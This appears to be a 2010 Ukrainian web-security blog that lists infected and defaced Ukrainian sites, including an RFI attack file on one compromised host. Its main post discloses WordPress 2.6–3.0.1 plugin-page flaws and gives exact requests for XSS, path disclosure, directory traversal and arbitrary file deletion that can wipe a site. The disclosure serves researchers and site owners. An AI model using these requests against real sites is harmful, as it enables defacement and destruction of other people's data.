Websecurity - Веб безпека

В 2009 році вийшов фільм Kaзка про талант, головну роль в якому виконав мій друг Сергій Кравець. Це український фільм.

В даному короткометражному художньому фільмі розповідається про талант до хакерства. Головний герой - програміст, що займається розробкою секюріті програмного забезпечення. Але із-за несправедливості, що його оточує, із-за неможливості заробити гроші на своїй діяльності, він починає займатися хакерством (в кримінальному значенні цього слова). Тобто починає займатися кіберзлочинами. Бо життя його змусило.

Так що можете подивитися цей українській художній фільм на тему хакерів .

Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.

• http://astimondoro.com.ua - інфекція була виявлена 12.09.2010. Зараз сайт не входить до переліку підозрілих.
• http://astra.kharkov.com - інфекція була виявлена 17.08.2010. Частина цього сайта була внесена до переліку сайтів із підозрілою активністю 1 раз протягом останніх 90 днів. Зараз сайт не входить до переліку підозрілих.
• http://astra.ua - інфекція була виявлена 23.08.2010. Частина цього сайта була внесена до переліку сайтів із підозрілою активністю 2 рази протягом останніх 90 днів. Зараз сайт не входить до переліку підозрілих.
• http://freebooks.net.ua - інфекція була виявлена 08.09.2010. Частина цього сайта була внесена до переліку сайтів із підозрілою активністю 33 рази протягом останніх 90 днів. Зараз сайт не входить до переліку підозрілих.
• http://monolitgroup.com.ua - інфекція була виявлена 29.09.2010. Частина цього сайта була внесена до переліку сайтів із підозрілою активністю 7 разів протягом останніх 90 днів. Зараз сайт не входить до переліку підозрілих.

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

• http://www.imago.if.ua (хакером SURMENAJ) - 08.09.2010, зараз сайт вже виправлений адмінами
• http://www.best-balkon.com.ua (хакером ExcalibuR) - 10.2010, зараз сайт вже виправлений адмінами
• http://www.darkmetal.com.ua (хакерами з IIpoBoCJIaBHbIe g]|[ugurda crew)
• http://realsatori.com (хакерами з AHG)
• http://part.com.ua (хакером cHyK0) - похакана директорія сайта

Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.

• http://pes-world.org.ua - інфекція була виявлена 18.07.2010. Частина цього сайта була внесена до переліку сайтів із підозрілою активністю 1 раз протягом останніх 90 днів. Зараз сайт не входить до переліку підозрілих.
• http://illusion.mk.ua - інфекція була виявлена 06.10.2010. Зараз сайт не входить до переліку підозрілих.
• http://bestplay.org.ua - інфекція була виявлена 06.10.2010. Частина цього сайта була внесена до переліку сайтів із підозрілою активністю 8 разів протягом останніх 90 днів. Зараз сайт не входить до переліку підозрілих.
• http://businessgo.info - інфекція була виявлена 07.10.2010. Зараз сайт входить до переліку підозрілих.
• http://gozofootball.net - інфекція була виявлена 04.10.2010. Частина цього сайта була внесена до переліку сайтів із підозрілою активністю 22 рази протягом останніх 90 днів. Зараз сайт не входить до переліку підозрілих.

Після попереднього виявлення похаканих сайтів в моїх логах, приведу нову інформацію про взломані українських сайти. Що використовуються для атак (зокрема RFI атак) на інші сайти.

Похакані сайти в Уанеті:

• http://plastifikator.vn.ua (хакером Casper_Kae) - 21.09.2010

Файли, що використовуються для RFI атак:

http://plastifikator.vn.ua/file/Ckrid1.txt

Через два місяці після проведення проекту День багів в WordPress 2 (Day of bugs in WordPress 2) я публікую численні уразливості в WordPress. Це в якості попереднього анонсу Дня багів в WordPress 3, який відбудеться з часом .

У серпні, 14.08.2010, я знайшов Cross-Site Scripting, Full path disclosure, Information Leakage, Directory Traversal, Arbitrary File Deletion і Denial of Service уразливості в WordPress.

Для всіх цих атак потрібно мати доступ до адмінського акаунта, або мати акаунт з правами для роботи з плагінами. Або атакувати адміна чи іншого користувача з необхідними правами через XSS, щоб дізнатися токен, призначений для захисту від CSRF атак.

Тому користувачам WordPress особливо переживати за ці дірки не треба (якщо не допускати вищезгаданих вимог). Але дані уразливості стануть в нагоді секюріті дослідникам при доступі до адмінки або наявності XSS на сайті. Тому розробникам WP бажано їх виправити.

Перевірено в WordPress 2.0.11, 2.6.2, 2.7, 2.8, 2.9.2, 3.0.1. Версії 2.0.х невразливі, тому що в них немає даного функціоналу. До різних уразливостей вразливі WordPress 2.6 - 3.0.1 та потенційно попередні версії.

Коментуючи XSS уразливість в WordPress 3.0.1, я зазначив додаткову інформацію стосовно XSS уразливості. Дані нюанси відносяться і до нищенаведених уразливостей. Атакувати можна як черех параметр checked[0], так через checked[1] і т.д., а також через checked[]. В версіях WP 2.7 і вище можна використовувати параметр action=delete-selected, а в версіях 2.8 і вище можна використовувати також параметр action2=delete-selected.

XSS:

Як я зазначав в вищезгаданому записі, в WordPress 2.6.x Cross-Site Scripting атака проводиться по іншому. І користі від даної XSS майже немає.

Для атаки потрібно послати POST запит до http://site/wp-admin/plugins.php з параметрами _wpnonce рівному значенню токена, delete-selected рівному “Delete” та checked[] рівному <body onload=alert(document.cookie)>.

Уразливі WordPress 2.6.x та потенційно попередні версії.

Full path disclosure:

Для атаки потрібно послати POST запит до http://site/wp-admin/plugins.php з параметрами _wpnonce рівному значенню токена, delete-selected рівному “Delete” та checked[] рівному “1″.

Уразливі WordPress 2.6.x та потенційно попередні версії.

Full path disclosure:

http://site/wp-admin/plugins.php?_wpnonce=e0dc6c722b&action=delete-selected&checked[]=1
http://site/wp-admin/plugins.php?_wpnonce=e0dc6c722b&action2=delete-selected&checked[]=1

Уразливі WordPress 2.7 - 3.0.1 (для параметра action2 - 2.8 і вище).

Full path disclosure:

http://site/wp-admin/plugins.php

Повний шлях виводиться прямо на сторінці з плагінами.

Уразливі WordPress 2.6 - 2.7.1.

Information Leakage + Directory Traversal:

На сторінці (в списку під лінкою Click to view entire list of files which will be deleted) виводиться перелік файлів в поточній папці та підпапках.

В папці http://site/wp-content/plugins/:
http://site/wp-admin/plugins.php?_wpnonce=e0dc6c722b&action=delete-selected&checked[]=
http://site/wp-admin/plugins.php?_wpnonce=e0dc6c722b&action2=delete-selected&checked[]=

В папці http://site/wp-content/:
http://site/wp-admin/plugins.php?_wpnonce=e0dc6c722b&action=delete-selected&checked[]=../1
http://site/wp-admin/plugins.php?_wpnonce=e0dc6c722b&action2=delete-selected&checked[]=../1

Уразливі WordPress 2.7 - 3.0.1 (для параметра action2 - 2.8 і вище). А також WordPress 2.6.х. В версіях 2.6.х потрібно послати відповідний POST запит до http://site/wp-admin/plugins.php (як зазначалось вище).

Arbitrary File Deletion + DoS:

Якщо послати вищенаведені запити з параметром verify-delete=1, то можна видалити файли та папки в поточній папці та підпапках. Враховуючи Directory Traversal можна видалити як всі плагіни, так й інші файли в інших папках, в тому числі можна провести DoS атаку на сайт (якщо видалити важливі файли WP). Наприклад з запитом checked[]=../../1 можна видалити весь сайт.

http://site/wp-admin/plugins.php?_wpnonce=e0dc6c722b&action=delete-selected&checked[]=../1&verify-delete=1
http://site/wp-admin/plugins.php?_wpnonce=e0dc6c722b&action2=delete-selected&checked[]=../1&verify-delete=1

Уразливі WordPress 2.7 - 3.0.1 (для параметра action2 - 2.8 і вище). А також WordPress 2.6.х. В версіях 2.6.х потрібно послати відповідний POST запит до http://site/wp-admin/plugins.php (як зазначалось вище).

Продовжуючи тему антивірусів для сайтів, розповім вам про ще один подібний сервіс. Це WOT - Web of Trust. В деякій мірі це ще один конкурент моїй Web VDS.

Даний сервіс призначений для створення рейтингу довіри до сайтів. В тому числі він може використовуватися для захисту від вірусів на веб сайтах та інших шкідливих сайтів. Він доступний як у вигляді плагіна для браузерів, так і у вигляді онлайн сервіса.

Веб сервіс Web of Trust відрізняється від таких сервісів як McAfee SiteAdvisor, Norton Safe Web від Symantec (хоча є деяка схожість з ними) та інших тим, що він представляє собою не сервіс виявлення шкідливого коду на сайтах, а рейтинг сайтів (де є в тому числі і шкідливі сайти). В цьому він подібний до сервісів Clean MX та DNS-BH – Malware Domain Blocklist.

Щоб скористатися даним сервісом, потрібно зайти на сайт та переглянути перелік сайтів за популярністю, та почитати детальну інформацію про сайт на сторінці WOT Reputation Scorecard (для конкретного сайта). Де може бути вказана інформація про інфікованість конкретного сайта. Або можна скористатися плагіном WOT add-on, що розроблений для багатьох браузерів (Mozilla Firefox, Google Chrome, Internet Explorer, Safari, а також існує букмарклет для інших браузерів).

Можете подитивитися на детальну інформацію про інфікований сайт tipsyking.com:

http://www.mywot.com/en/scorecard/tipsyking.com

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах WordPress Polls та WP-Forum. Для котрих з’явилися експлоіти. WordPress Polls - це плагін для створення голосувань, WP-Forum - це плагін для створення форуму.

• WordPress Polls 2.x Incorrect Flood Filter (деталі)
• WP-Forum <= 2.3 SQL Injection vulnerabilities (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

• http://podrujki.org.ua (хакером Dr.SiLnT HilL) - 24.09.2010, зараз сайт вже виправлений адмінами
• http://www.n-steni.com.ua (хакером HoppuS)
• http://vstyle.kiev.ua (хакером Houssem jrad) - 22.09.2010, зараз сайт вже виправлений адмінами
• http://www.elektrodom.sumy.ua (хакером Real_Karizma) - 18.09.2010, зараз сайт не працює
• http://minimen.com.ua (хакерами з Wannabe Hacker Team)

Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.

• http://volleyball.org.ua - інфекція була виявлена 22.09.2010. Частина цього сайта була внесена до переліку сайтів із підозрілою активністю 7 разів протягом останніх 90 днів. Зараз сайт не входить до переліку підозрілих.
• http://pallada.kherson.ua - інфекція була виявлена 17.09.2010. Частина цього сайта була внесена до переліку сайтів із підозрілою активністю 4 рази протягом останніх 90 днів. Зараз сайт не входить до переліку підозрілих.
• http://pallada.ks.ua - інфекція була виявлена 14.09.2010. Частина цього сайта була внесена до переліку сайтів із підозрілою активністю 3 рази протягом останніх 90 днів. Зараз сайт входить до переліку підозрілих.
• http://dpa.kharkov.ua - інфікований державний сайт - інфекція була виявлена 25.09.2010. Зараз сайт не входить до переліку підозрілих.
• http://mybigcash.com - інфекція була виявлена 24.07.2010. Зараз сайт не входить до переліку підозрілих.